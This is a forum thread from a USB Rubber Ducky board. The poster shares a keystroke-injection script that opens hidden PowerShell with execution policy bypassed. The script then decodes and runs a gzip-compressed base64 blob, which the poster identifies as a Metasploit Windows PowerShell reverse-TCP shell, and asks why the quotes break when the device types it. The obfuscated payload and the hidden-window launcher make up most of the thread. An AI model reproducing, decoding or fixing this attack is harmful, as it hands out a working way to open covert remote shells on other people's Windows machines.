Jump to content

base64 powershell windows 10

R03L

By R03L
in Classic USB Rubber Ducky

 Share

Recommended Posts

R03L Newbie

R03L

Posted
Posted


I got this working shell from text on windows 10 desktop,
and press ENTER it works perfectly,
but afther insering it in the ducky dus ducky code ENTER it stay's unclosed and the " are not in place.

ducky beginners mistakes, details also MS is always busy imposing themself with slightest changes wich actualy linux has most minimal.
its a nice tool tho.
playing arround with these details but for today i seem not to find this little detail,
well its 34 degree's heatwave outside, so meybe anybody can help me with it.
  

DELAY 400
GUI r
DELAY 450
STRING powershell
ENTER
DELAY 400
STRING powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAOtBEl0CA51W227jNhB991cMXHUtIRZhG+22DZBFvUq2DZDuGiu3eTAMhKbGsRqZdEnKFyT+95ISZclxgm2qF1vk8MyZMxfqOxiJDcp5ziGEW5lqjRxmO/hofsa55CjhHVzSNcLvVCa7VstYMp0KDr+hDm9xxrIUuYbWYwvM420YXMBn3IRfZn8j0xCOdyv8TJdoFjUx9lFhXxmTPxVe4pzmmY4kJmYnpZkyEJ6WOR6sRlJsd+SZhVlvrFS2rX1NcVWF1nqEYn9EJV365f9JrGXK76deJJZLypPu8WqsMib4s8VLseGZoEmxGjhMKRgqBU6ApUjyDC3BX/0ASpN0Dn7lBkL8B9qzlCftoNgszxVns1QZ+Y3kF8blzvxfEqtaLNgDakXGbHXjLKY/mOf0IFGaSm39Os/FrkvRRcNuyBiutAEs0+GXVPav0ZW4RqnwlPEBupHyl5hHI+eo3f9lQPrvfyZ98v6ndteG4Xy3Sv2UlkiXlmyJTUydxcWaIVnTK9NTsrOl0nbZaHBTKosrsFfoIctNye9IXJn6zn/Xm5uawq7/6I0N+h5CqmBydOYrLoXGCKVO5ymjGv+iWZpQW3gRzbIZZQ/TIHiBDhnmemGr1h4aqheFCRrpqxWpI2pKNpntNE6mU8/+2sLrETLomefp+8fe3qmKPKm2/YnGrSbImUhsVZ+fD+Po+jqwSn+0Nn771pSn2KhyNsQLzDKQOefGGowOuTIl2oYz8JCvz+0btw1+ZtZMSg4bTCxXua4373gkVjuZ3i80+FEAg17/R/gjZVIoMdcQCbkSstCPwNB6tJYKJBoHa0zIHb/jrgKdJsQOLPTr6Lq9bv1CbpDf60Wzaqr+bdbNSdm8TarJ2RRuDKTVxvU+OfB8O9fq1CchryhbGM4lKKT8MFtqq5q2ffyjkRyQKtpyelVIwdM1X4sHDK+2K6OtMnofUPbHrfgmJTqjGDomzwWLG8GKTAZkRPXCrHY+dP536jaLNEPf99KiB8rjX5EmflnxXeh1wTs6F0DIEXonub2y9DEZm1Beu6bceLAmpAjxyoVco5gmp5ZKA81NqULmKhzw0uBZWZmZYLU8SQCE1bgtwQcf3vXhCb7kOixRwUlxBDWAQpAK2Ij8jRRApwbZWiIeSinkpDc9ctZgXewTliGVfvASg4vmi2n8beu0k/5T+dQw32ydZqmcNE515lOWq8XhBnZj0F0pUSYUunjqOzHWYlVdhOYronX4ejgkx12DELrbxw6QfwFi5zEjQQkAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
ENTER
DELAY 1000
GUI r
DELAY 200
ESC
DELAY 100
ESC
DELAY 100
ESC
Link to comment
Share on other sites
R03L Newbie

R03L

Posted
  • Author
Posted (edited)

ow yea this base64 is virtualnet no mind, shell works.
payload(cmd/windows/powershell_reverse_tcp
afther copy and paste it from inside windows vm guest it just doesn't on ducky,

difference theoretically
is virtual ducky code ENTER and physical enter.

Edited by R03L
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...